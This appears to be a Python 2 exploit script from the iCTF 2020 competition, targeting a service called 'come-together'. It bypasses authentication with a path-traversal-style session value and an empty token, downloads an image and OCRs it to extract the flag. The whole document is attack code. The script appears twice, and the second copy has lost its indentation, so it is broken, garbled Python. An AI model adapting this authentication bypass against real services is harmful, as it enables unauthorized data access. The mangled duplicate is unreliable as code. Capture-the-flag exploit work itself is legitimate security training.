conand/come-together-ictf-2020-exploit.py

## come-together-ictf-2020-exploit.py
#! /usr/bin/env python2

import sys
import json
import requests
import traceback
from subprocess import Popen, PIPE
from PIL import Image
import pytesseract


SIZES = [(250, 250), (230, 230), (60, 60), (200, 200)]
POSITIONS = ['+335+360', '+780+30', '+100+65', '+540+25']


def exploit(ip, port, flag_id):
    session = './././{}'.format(flag_id)
    token=''
    url = 'http://{}:{}/love?session={}&token={}'.format(ip, port, session, token)
    r = requests.get(url)

    if r.status_code != 200:
        raise Exception('n00000000b')

    with open('retrieved_ex_1.png', 'wb') as f:
        f.write(r.content)

    flag = ''

    for i in [0, 1, 3]:
        p = Popen(['convert',
                   'retrieved_ex_1.png',
                   '-crop',
                   '{}x{}{}'.format(SIZES[i][0], SIZES[i][1], POSITIONS[i]),
                   'cropped_ex_1.png'])
        p.communicate()

        x = pytesseract.image_to_string(Image.open('cropped_ex_1.png'))
        if x.startswith('FL'):
            flag = x.replace('\n', '')
            break

    return {
            'error': 0,
            'error_msg': '',
            'payload': {'flag': flag}
           }


def main():
    try:
        if len(sys.argv) != 4:
            print('Use: python2 exploit_1.py <HOST> <PORT> <FLAG_ID>')
            raise Exception('Missing parameters')

        print json.dumps(exploit(sys.argv[1], sys.argv[2], sys.argv[3]))

    except Exception as e:
        response = {
            "error": 1,
            "error_msg": str(e) + traceback.format_exc(),
            "payload": {}
        }
        print json.dumps(response)


if __name__ == "__main__":
    main()
	#! /usr/bin/env python2

	import sys
	import json
	import requests
	import traceback
	from subprocess import Popen, PIPE
	from PIL import Image
	import pytesseract


	SIZES = [(250, 250), (230, 230), (60, 60), (200, 200)]
	POSITIONS = ['+335+360', '+780+30', '+100+65', '+540+25']


	def exploit(ip, port, flag_id):
	session = './././{}'.format(flag_id)
	token=''
	url = 'http://{}:{}/love?session={}&token={}'.format(ip, port, session, token)
	r = requests.get(url)

	if r.status_code != 200:
	raise Exception('n00000000b')

	with open('retrieved_ex_1.png', 'wb') as f:
	f.write(r.content)

	flag = ''

	for i in [0, 1, 3]:
	p = Popen(['convert',
	'retrieved_ex_1.png',
	'-crop',
	'{}x{}{}'.format(SIZES[i][0], SIZES[i][1], POSITIONS[i]),
	'cropped_ex_1.png'])
	p.communicate()

	x = pytesseract.image_to_string(Image.open('cropped_ex_1.png'))
	if x.startswith('FL'):
	flag = x.replace('\n', '')
	break

	return {
	'error': 0,
	'error_msg': '',
	'payload': {'flag': flag}
	}


	def main():
	try:
	if len(sys.argv) != 4:
	print('Use: python2 exploit_1.py <HOST> <PORT> <FLAG_ID>')
	raise Exception('Missing parameters')

	print json.dumps(exploit(sys.argv[1], sys.argv[2], sys.argv[3]))

	except Exception as e:
	response = {
	"error": 1,
	"error_msg": str(e) + traceback.format_exc(),
	"payload": {}
	}
	print json.dumps(response)



	if __name__ == "__main__":
	main()